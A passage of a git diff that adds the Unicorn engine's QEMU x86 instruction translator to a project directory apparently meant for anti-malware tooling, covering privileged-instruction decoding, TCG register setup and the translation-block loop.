tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,cr[0]) + 4); +#else + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,cr[0])); +#endif + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 1); + break; + case 6: /* lmsw */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_helper_lmsw(tcg_ctx, cpu_env, *cpu_T[0]); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 7: + if (mod != 3) { /* invlpg */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_lea_modrm(env, s, modrm); + gen_helper_invlpg(tcg_ctx, cpu_env, cpu_A0); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + } else { + switch (rm) { + case 0: /* swapgs */ +#ifdef TARGET_X86_64 + if 
(CODE64(s)) { + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,segs[R_GS].base)); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[1], cpu_env, + offsetof(CPUX86State,kernelgsbase)); + tcg_gen_st_tl(tcg_ctx, *cpu_T[1], cpu_env, + offsetof(CPUX86State,segs[R_GS].base)); + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,kernelgsbase)); + } + } else +#endif + { + goto illegal_op; + } + break; + case 1: /* rdtscp */ + if (!(s->cpuid_ext2_features & CPUID_EXT2_RDTSCP)) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_rdtscp(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + } + break; + default: + goto illegal_op; + } + break; + case 0x108: /* invd */ + case 0x109: /* wbinvd */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, (b & 2) ? SVM_EXIT_INVD : SVM_EXIT_WBINVD); + /* nothing to do */ + } + break; + case 0x63: /* arpl or movslS (x86_64) */ +#ifdef TARGET_X86_64 + if (CODE64(s)) { + int d_ot; + /* d_ot is the size of destination */ + d_ot = dflag; + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], rm); + /* sign extend */ + if (d_ot == MO_64) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, MO_32 | MO_SIGN, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } + } else +#endif + { + int label1; + TCGv t0, t1, t2, a0; + + if (!s->pe || s->vm86) + goto illegal_op; + t0 = tcg_temp_local_new(tcg_ctx); + t1 = tcg_temp_local_new(tcg_ctx); + t2 = tcg_temp_local_new(tcg_ctx); + ot = MO_16; + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 
7; + mod = (modrm >> 6) & 3; + rm = modrm & 7; + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, t0, cpu_A0); + a0 = tcg_temp_local_new(tcg_ctx); + tcg_gen_mov_tl(tcg_ctx, a0, cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, t0, rm); + TCGV_UNUSED(a0); + } + gen_op_mov_v_reg(tcg_ctx, ot, t1, reg); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, t0, 3); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 3); + tcg_gen_movi_tl(tcg_ctx, t2, 0); + label1 = gen_new_label(tcg_ctx); + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, cpu_tmp0, t1, label1); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_gen_movi_tl(tcg_ctx, t2, CC_Z); + gen_set_label(tcg_ctx, label1); + if (mod != 3) { + gen_op_st_v(s, ot, t0, a0); + tcg_temp_free(tcg_ctx, a0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, t0); + } + gen_compute_eflags(s); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, ~CC_Z); + tcg_gen_or_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, t2); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t2); + } + break; + case 0x102: /* lar */ + case 0x103: /* lsl */ + { + int label1; + TCGv t0; + if (!s->pe || s->vm86) + goto illegal_op; + ot = dflag != MO_16 ? 
MO_32 : MO_16; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + t0 = tcg_temp_local_new(tcg_ctx); + gen_update_cc_op(s); + if (b == 0x102) { + gen_helper_lar(tcg_ctx, t0, cpu_env, *cpu_T[0]); + } else { + gen_helper_lsl(tcg_ctx, t0, cpu_env, *cpu_T[0]); + } + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, CC_Z); + label1 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_tmp0, 0, label1); + gen_op_mov_reg_v(tcg_ctx, ot, reg, t0); + gen_set_label(tcg_ctx, label1); + set_cc_op(s, CC_OP_EFLAGS); + tcg_temp_free(tcg_ctx, t0); + } + break; + case 0x118: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + switch(op) { + case 0: /* prefetchnta */ + case 1: /* prefetchnt0 */ + case 2: /* prefetchnt0 */ + case 3: /* prefetchnt0 */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + /* nothing more to do */ + break; + default: /* nop (multi byte) */ + gen_nop_modrm(env, s, modrm); + break; + } + break; + //case 0x119 ... 0x11f: /* nop (multi byte) */ + case 0x119: case 0x11a: case 0x11b: case 0x11c: case 0x11d: case 0x11e: case 0x11f: + modrm = cpu_ldub_code(env, s->pc++); + gen_nop_modrm(env, s, modrm); + break; + case 0x120: /* mov reg, crN */ + case 0x122: /* mov crN, reg */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + modrm = cpu_ldub_code(env, s->pc++); + /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). + * AMD documentation (24594.pdf) and testing of + * intel 386 and 486 processors all show that the mod bits + * are assumed to be 1's, regardless of actual values. 
+ */ + rm = (modrm & 7) | REX_B(s); + reg = ((modrm >> 3) & 7) | rex_r; + if (CODE64(s)) + ot = MO_64; + else + ot = MO_32; + if ((prefixes & PREFIX_LOCK) && (reg == 0) && + (s->cpuid_ext3_features & CPUID_EXT3_CR8LEG)) { + reg = 8; + } + switch(reg) { + case 0: + case 2: + case 3: + case 4: + case 8: + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + if (b & 2) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + gen_helper_write_crN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, reg), + *cpu_T[0]); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } else { + gen_helper_read_crN(tcg_ctx, *cpu_T[0], cpu_env, tcg_const_i32(tcg_ctx, reg)); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + break; + default: + goto illegal_op; + } + } + break; + case 0x121: /* mov reg, drN */ + case 0x123: /* mov drN, reg */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + modrm = cpu_ldub_code(env, s->pc++); + /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). + * AMD documentation (24594.pdf) and testing of + * intel 386 and 486 processors all show that the mod bits + * are assumed to be 1's, regardless of actual values. 
+ */ + rm = (modrm & 7) | REX_B(s); + reg = ((modrm >> 3) & 7) | rex_r; + if (CODE64(s)) + ot = MO_64; + else + ot = MO_32; + /* XXX: do it dynamically with CR4.DE bit */ + if (reg == 4 || reg == 5 || reg >= 8) + goto illegal_op; + if (b & 2) { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_DR0 + reg); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + gen_helper_movl_drN_T0(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, reg), *cpu_T[0]); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_DR0 + reg); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,dr[reg])); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + } + break; + case 0x106: /* clts */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); + gen_helper_clts(tcg_ctx, cpu_env); + /* abort block because static cpu state changed */ + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + /* MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4 support */ + case 0x1c3: /* MOVNTI reg, mem */ + if (!(s->cpuid_features & CPUID_SSE2)) + goto illegal_op; + ot = mo_64_32(dflag); + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + reg = ((modrm >> 3) & 7) | rex_r; + /* generate a generic store */ + gen_ldst_modrm(env, s, modrm, ot, reg, 1); + break; + case 0x1ae: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + switch(op) { + case 0: /* fxsave */ + if (mod == 3 || !(s->cpuid_features & CPUID_FXSR) || + (s->prefix & PREFIX_LOCK)) + goto illegal_op; + if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + gen_lea_modrm(env, s, modrm); + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fxsave(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag == MO_64)); + break; + 
case 1: /* fxrstor */ + if (mod == 3 || !(s->cpuid_features & CPUID_FXSR) || + (s->prefix & PREFIX_LOCK)) + goto illegal_op; + if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + gen_lea_modrm(env, s, modrm); + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fxrstor(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag == MO_64)); + break; + case 2: /* ldmxcsr */ + case 3: /* stmxcsr */ + if (s->flags & HF_TS_MASK) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + if ((s->flags & HF_EM_MASK) || !(s->flags & HF_OSFXSR_MASK) || + mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + if (op == 2) { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_ldmxcsr(tcg_ctx, cpu_env, cpu_tmp2_i32); + } else { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, mxcsr)); + gen_op_st_v(s, MO_32, *cpu_T[0], cpu_A0); + } + break; + case 5: /* lfence */ + case 6: /* mfence */ + if ((modrm & 0xc7) != 0xc0 || !(s->cpuid_features & CPUID_SSE2)) + goto illegal_op; + break; + case 7: /* sfence / clflush */ + if ((modrm & 0xc7) == 0xc0) { + /* sfence */ + /* XXX: also check for cpuid_ext2_features & CPUID_EXT2_EMMX */ + if (!(s->cpuid_features & CPUID_SSE)) + goto illegal_op; + } else { + /* clflush */ + if (!(s->cpuid_features & CPUID_CLFLUSH)) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + } + break; + default: + goto illegal_op; + } + break; + case 0x10d: /* 3DNow! 
prefetch(w) */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + /* ignore for now */ + break; + case 0x1aa: /* rsm */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_RSM); + if (!(s->flags & HF_SMM_MASK)) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, s->pc - s->cs_base); + gen_helper_rsm(tcg_ctx, cpu_env); + gen_eob(s); + break; + case 0x1b8: /* SSE4.2 popcnt */ + if ((prefixes & (PREFIX_REPZ | PREFIX_LOCK | PREFIX_REPNZ)) != + PREFIX_REPZ) + goto illegal_op; + if (!(s->cpuid_ext_features & CPUID_EXT_POPCNT)) + goto illegal_op; + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + if (s->prefix & PREFIX_DATA) { + ot = MO_16; + } else { + ot = mo_64_32(dflag); + } + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_helper_popcnt(tcg_ctx, *cpu_T[0], cpu_env, *cpu_T[0], tcg_const_i32(tcg_ctx, ot)); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x10e: case 0x10f: + /* 3DNow! instructions, ignore prefixes */ + s->prefix &= ~(PREFIX_REPZ | PREFIX_REPNZ | PREFIX_DATA); + case 0x110: case 0x111: case 0x112: case 0x113: case 0x114: case 0x115: case 0x116: case 0x117: //case 0x110 ... 0x117: + case 0x128: case 0x129: case 0x12a: case 0x12b: case 0x12c: case 0x12d: case 0x12e: case 0x12f: //case 0x128 ... 0x12f: + case 0x138: case 0x139: case 0x13a: + // case 0x150 ... 
0x179: + case 0x150: case 0x151: case 0x152: case 0x153: case 0x154: case 0x155: case 0x156: case 0x157: + case 0x158: case 0x159: case 0x15a: case 0x15b: case 0x15c: case 0x15d: case 0x15e: case 0x15f: + case 0x160: case 0x161: case 0x162: case 0x163: case 0x164: case 0x165: case 0x166: case 0x167: + case 0x168: case 0x169: case 0x16a: case 0x16b: case 0x16c: case 0x16d: case 0x16e: case 0x16f: + case 0x170: case 0x171: case 0x172: case 0x173: case 0x174: case 0x175: case 0x176: case 0x177: + case 0x178: case 0x179: + // case 0x17c ... 0x17f: + case 0x17c: case 0x17d: case 0x17e: case 0x17f: + case 0x1c2: + case 0x1c4: case 0x1c5: case 0x1c6: + //case 0x1d0 ... 0x1fe: + case 0x1d0: case 0x1d1: case 0x1d2: case 0x1d3: case 0x1d4: case 0x1d5: case 0x1d6: case 0x1d7: + case 0x1d8: case 0x1d9: case 0x1da: case 0x1db: case 0x1dc: case 0x1dd: case 0x1de: case 0x1df: + case 0x1e0: case 0x1e1: case 0x1e2: case 0x1e3: case 0x1e4: case 0x1e5: case 0x1e6: case 0x1e7: + case 0x1e8: case 0x1e9: case 0x1ea: case 0x1eb: case 0x1ec: case 0x1ed: case 0x1ee: case 0x1ef: + case 0x1f0: case 0x1f1: case 0x1f2: case 0x1f3: case 0x1f4: case 0x1f5: case 0x1f6: case 0x1f7: + case 0x1f8: case 0x1f9: case 0x1fa: case 0x1fb: case 0x1fc: case 0x1fd: case 0x1fe: + gen_sse(env, s, b, pc_start, rex_r); + break; + default: + goto illegal_op; + } + /* lock generation */ + if (s->prefix & PREFIX_LOCK) + gen_helper_unlock(tcg_ctx, cpu_env); + + // Unicorn: patch the callback for the instruction size + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, pc_start)) { + // int i; + // for(i = 0; i < 20; i++) + // printf("=== [%u] = %x\n", i, *(save_opparam_ptr + i)); + // printf("\n"); + if (changed_cc_op) { + if (cc_op_dirty) +#if TCG_TARGET_REG_BITS == 32 + *(save_opparam_ptr + 16) = s->pc - pc_start; + else + *(save_opparam_ptr + 14) = s->pc - pc_start; +#else + *(save_opparam_ptr + 12) = s->pc - pc_start; + else + *(save_opparam_ptr + 10) = s->pc - pc_start; +#endif + } else { + *(save_opparam_ptr + 1) 
= s->pc - pc_start;
+        }
+    }
+
+    return s->pc;
+ illegal_op:
+    if (s->prefix & PREFIX_LOCK)
+        gen_helper_unlock(tcg_ctx, cpu_env);
+    /* XXX: ensure that no lock was generated */
+    gen_exception(s, EXCP06_ILLOP, pc_start - s->cs_base);
+    return s->pc;
+}
+
+/* Register the TCG global variables that mirror the x86 CPU state for this
+ * emulator instance: the env pointer, the 32-bit cc_op, the cc_dst/cc_src/
+ * cc_src2 condition-code staging values, and one global per general-purpose
+ * register (register names selected by TARGET_X86_64).  Unicorn heap-allocates
+ * the TCGv handles with g_malloc0() so each uc_struct carries its own copies
+ * instead of the file-static globals upstream QEMU uses.
+ * NOTE(review): presumably called exactly once per uc instance before any
+ * translation -- confirm against the caller; nothing here guards re-entry. */
+void optimize_flags_init(struct uc_struct *uc)
+{
+    static const char reg_names[CPU_NB_REGS][4] = {
+#ifdef TARGET_X86_64
+        "rax",
+        "rcx",
+        "rdx",
+        "rbx",
+        "rsp",
+        "rbp",
+        "rsi",
+        "rdi",
+        "r8",
+        "r9",
+        "r10",
+        "r11",
+        "r12",
+        "r13",
+        "r14",
+        "r15",
+#else
+        "eax",
+        "ecx",
+        "edx",
+        "ebx",
+        "esp",
+        "ebp",
+        "esi",
+        "edi",
+#endif
+    };
+    int i;
+    TCGContext *tcg_ctx = uc->tcg_ctx;
+
+    tcg_ctx->cpu_env = tcg_global_reg_new_ptr(uc->tcg_ctx, TCG_AREG0, "env");
+    tcg_ctx->cpu_cc_op = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0,
+        offsetof(CPUX86State, cc_op), "cc_op");
+    /* cc_dst/cc_src/cc_src2: heap-allocated TCGv wrappers bound to the
+     * corresponding CPUX86State fields (see the function comment). */
+    tcg_ctx->cpu_cc_dst = g_malloc0(sizeof(TCGv));
+    *((TCGv *)tcg_ctx->cpu_cc_dst) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0,
+        offsetof(CPUX86State, cc_dst), "cc_dst");
+
+    tcg_ctx->cpu_cc_src = g_malloc0(sizeof(TCGv));
+    *((TCGv *)tcg_ctx->cpu_cc_src) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0,
+        offsetof(CPUX86State, cc_src), "cc_src");
+
+    tcg_ctx->cpu_cc_src2 = g_malloc0(sizeof(TCGv));
+    *((TCGv *)tcg_ctx->cpu_cc_src2) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0,
+        offsetof(CPUX86State, cc_src2), "cc_src2");
+
+    /* One TCG global per architectural GP register, backed by env->regs[i]. */
+    for (i = 0; i < CPU_NB_REGS; ++i) {
+        tcg_ctx->cpu_regs[i] = g_malloc0(sizeof(TCGv));
+        *((TCGv *)tcg_ctx->cpu_regs[i]) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0,
+                                                             offsetof(CPUX86State, regs[i]),
+                                                             reg_names[i]);
+    }
+}
+
+/* generate intermediate code in gen_opc_buf and gen_opparam_buf for
+   basic block 'tb'. If search_pc is TRUE, also generate PC
+   information for each intermediate instruction.
*/
+static inline void gen_intermediate_code_internal(uint8_t *gen_opc_cc_op,
+                                                  X86CPU *cpu,
+                                                  TranslationBlock *tb,
+                                                  bool search_pc)
+{
+    CPUState *cs = CPU(cpu);
+    CPUX86State *env = &cpu->env;
+    TCGContext *tcg_ctx = env->uc->tcg_ctx;
+    DisasContext dc1, *dc = &dc1;
+    target_ulong pc_ptr;
+    uint16_t *gen_opc_end;
+    CPUBreakpoint *bp;
+    int j;
+    int lj = -1;
+    uint64_t flags;
+    target_ulong pc_start;
+    target_ulong cs_base;
+    int num_insns = 0;
+    int max_insns;
+    bool block_full = false;
+
+    /* generate intermediate code */
+    pc_start = tb->pc;
+    cs_base = tb->cs_base;
+    flags = tb->flags;
+
+    /* Seed the disassembly context from the TB flags: protected mode, 16/32
+     * bit code and stack sizes, VM86, CPL/IOPL, trap flag, etc. */
+    dc->uc = env->uc;
+    dc->pe = (flags >> HF_PE_SHIFT) & 1;
+    dc->code32 = (flags >> HF_CS32_SHIFT) & 1;
+    dc->ss32 = (flags >> HF_SS32_SHIFT) & 1;
+    dc->addseg = (flags >> HF_ADDSEG_SHIFT) & 1;
+    dc->f_st = 0;
+    dc->vm86 = (flags >> VM_SHIFT) & 1;
+    dc->cpl = (flags >> HF_CPL_SHIFT) & 3;
+    dc->iopl = (flags >> IOPL_SHIFT) & 3;
+    dc->tf = (flags >> TF_SHIFT) & 1;
+    dc->singlestep_enabled = cs->singlestep_enabled;
+    dc->last_cc_op = dc->cc_op = CC_OP_DYNAMIC;
+    dc->cc_op_dirty = false;
+    dc->cs_base = cs_base;
+    dc->tb = tb;
+    dc->popl_esp_hack = 0;
+    /* select memory access functions */
+    dc->mem_index = 0;
+    if (flags & HF_SOFTMMU_MASK) {
+        dc->mem_index = cpu_mmu_index(env);
+    }
+    /* Cache the CPUID feature words the decoder consults for illegal-opcode
+     * checks (SSE2, MONITOR, SMAP, ...). */
+    dc->cpuid_features = env->features[FEAT_1_EDX];
+    dc->cpuid_ext_features = env->features[FEAT_1_ECX];
+    dc->cpuid_ext2_features = env->features[FEAT_8000_0001_EDX];
+    dc->cpuid_ext3_features = env->features[FEAT_8000_0001_ECX];
+    dc->cpuid_7_0_ebx_features = env->features[FEAT_7_0_EBX];
+#ifdef TARGET_X86_64
+    dc->lma = (flags >> HF_LMA_SHIFT) & 1;
+    dc->code64 = (flags >> HF_CS64_SHIFT) & 1;
+#endif
+    dc->flags = flags;
+    /* Direct TB chaining is disabled under single-step, trap flag, or
+     * inhibited interrupts, since each instruction must end the block. */
+    dc->jmp_opt = !(dc->tf || cs->singlestep_enabled ||
+                    (flags & HF_INHIBIT_IRQ_MASK)
+#ifndef CONFIG_SOFTMMU
+                    || (flags & HF_SOFTMMU_MASK)
+#endif
+                    );
+#if 0
+    /* check addseg logic */
+    if (!dc->addseg && (dc->vm86 || !dc->pe || !dc->code32))
+        printf("ERROR addseg\n");
+#endif
+
+    /* Unicorn: the TCGv handles live on the heap and are allocated once per
+     * uc instance (guarded by init_tcg); the temporaries themselves are
+     * re-created for every translation run. */
+    if (!env->uc->init_tcg)
+        tcg_ctx->cpu_T[0] = g_malloc0(sizeof(TCGv));
+    *(TCGv *)tcg_ctx->cpu_T[0] = tcg_temp_new(tcg_ctx);
+
+    if (!env->uc->init_tcg)
+        tcg_ctx->cpu_T[1] = g_malloc0(sizeof(TCGv));
+    *(TCGv *)tcg_ctx->cpu_T[1] = tcg_temp_new(tcg_ctx);
+
+    if (!env->uc->init_tcg)
+        tcg_ctx->cpu_A0 = g_malloc0(sizeof(TCGv));
+    *((TCGv *)tcg_ctx->cpu_A0) = tcg_temp_new(tcg_ctx);
+
+    if (!env->uc->init_tcg)
+        tcg_ctx->cpu_tmp0 = g_malloc0(sizeof(TCGv));
+    *((TCGv *)tcg_ctx->cpu_tmp0) = tcg_temp_new(tcg_ctx);
+
+    if (!env->uc->init_tcg)
+        tcg_ctx->cpu_tmp4 = g_malloc0(sizeof(TCGv));
+    *((TCGv *)tcg_ctx->cpu_tmp4) = tcg_temp_new(tcg_ctx);
+
+    tcg_ctx->cpu_tmp1_i64 = tcg_temp_new_i64(tcg_ctx);
+    tcg_ctx->cpu_tmp2_i32 = tcg_temp_new_i32(tcg_ctx);
+    tcg_ctx->cpu_tmp3_i32 = tcg_temp_new_i32(tcg_ctx);
+    tcg_ctx->cpu_ptr0 = tcg_temp_new_ptr(tcg_ctx);
+    tcg_ctx->cpu_ptr1 = tcg_temp_new_ptr(tcg_ctx);
+
+    if (!env->uc->init_tcg)
+        tcg_ctx->cpu_cc_srcT = g_malloc0(sizeof(TCGv));
+    *((TCGv *)tcg_ctx->cpu_cc_srcT) = tcg_temp_local_new(tcg_ctx);
+
+    // done with initializing TCG variables
+    env->uc->init_tcg = true;
+
+    pc_ptr = pc_start;
+
+    // early check to see if the address of this block is the until address
+    if (tb->pc == env->uc->addr_end) {
+        // imitate the HLT instruction
+        gen_tb_start(tcg_ctx);
+        gen_jmp_im(dc, tb->pc - tb->cs_base);
+        gen_helper_hlt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0));
+        dc->is_jmp = DISAS_TB_JUMP;
+        goto done_generating;
+    }
+
+    gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE;
+
+    dc->is_jmp = DISAS_NEXT;
+    max_insns = tb->cflags & CF_COUNT_MASK;
+    if (max_insns == 0)
+        max_insns = CF_COUNT_MASK;
+
+    // Unicorn: trace this block on request
+    // Only hook this block if the previous block was not truncated due to space
+    if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) {
+        env->uc->block_addr = pc_start;
+        env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1;
+        gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start);
+    } else {
+        env->uc->size_arg = -1;
+    }
+
+    gen_tb_start(tcg_ctx);
+    /* Main translation loop: one guest instruction per iteration until the
+     * block ends or one of the stop conditions below fires. */
+    for(;;) {
+        if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) {
+            QTAILQ_FOREACH(bp, &cs->breakpoints, entry) {
+                if (bp->pc == pc_ptr &&
+                    !((bp->flags & BP_CPU) && (tb->flags & HF_RF_MASK))) {
+                    gen_debug(dc, pc_ptr - dc->cs_base);
+                    goto done_generating;
+                }
+            }
+        }
+        /* When search_pc is set, record per-op PC and cc_op so faulting
+         * instructions can be located later (see restore_state_to_opc). */
+        if (search_pc) {
+            j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf;
+            if (lj < j) {
+                lj++;
+                while (lj < j)
+                    tcg_ctx->gen_opc_instr_start[lj++] = 0;
+            }
+            tcg_ctx->gen_opc_pc[lj] = pc_ptr;
+            gen_opc_cc_op[lj] = dc->cc_op;
+            tcg_ctx->gen_opc_instr_start[lj] = 1;
+            // tcg_ctx->gen_opc_icount[lj] = num_insns;
+        }
+        //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO))
+        //    gen_io_start();
+
+        // Unicorn: save current PC address to sync EIP
+        dc->prev_pc = pc_ptr;
+        pc_ptr = disas_insn(env, dc, pc_ptr);
+        num_insns++;
+        /* stop translation if indicated */
+        if (dc->is_jmp)
+            break;
+        /* if single step mode, we generate only one instruction and
+           generate an exception */
+        /* if irq were inhibited with HF_INHIBIT_IRQ_MASK, we clear
+           the flag and abort the translation to give the irqs a
+           change to be happen */
+        if (dc->tf || dc->singlestep_enabled ||
+            (flags & HF_INHIBIT_IRQ_MASK)) {
+            gen_jmp_im(dc, pc_ptr - dc->cs_base);
+            gen_eob(dc);
+            break;
+        }
+        /* if too long translation, stop generation too */
+        if (tcg_ctx->gen_opc_ptr >= gen_opc_end ||
+            (pc_ptr - pc_start) >= (TARGET_PAGE_SIZE - 32) ||
+            num_insns >= max_insns) {
+            gen_jmp_im(dc, pc_ptr - dc->cs_base);
+            gen_eob(dc);
+            block_full = true;
+            break;
+        }
+    }
+    //if (tb->cflags & CF_LAST_IO)
+    //    gen_io_end();
+done_generating:
+    gen_tb_end(tcg_ctx, tb, num_insns);
+    *tcg_ctx->gen_opc_ptr = INDEX_op_end;
+    /* we don't forget to fill the last values */
+    if (search_pc) {
+        j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf;
+        lj++;
+        while (lj <= j)
+            tcg_ctx->gen_opc_instr_start[lj++] = 0;
+    }
+ + if (!search_pc) { + tb->size = pc_ptr - pc_start; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code(CPUX86State *env, TranslationBlock *tb) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + gen_intermediate_code_internal(tcg_ctx->gen_opc_cc_op, + x86_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc(CPUX86State *env, TranslationBlock *tb) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + gen_intermediate_code_internal(tcg_ctx->gen_opc_cc_op, + x86_env_get_cpu(env), tb, true); +} + +void restore_state_to_opc(CPUX86State *env, TranslationBlock *tb, int pc_pos) +{ + int cc_op; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + env->eip = tcg_ctx->gen_opc_pc[pc_pos] - tb->cs_base; + cc_op = tcg_ctx->gen_opc_cc_op[pc_pos]; + if (cc_op != CC_OP_DYNAMIC) + env->cc_op = cc_op; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.c new file mode 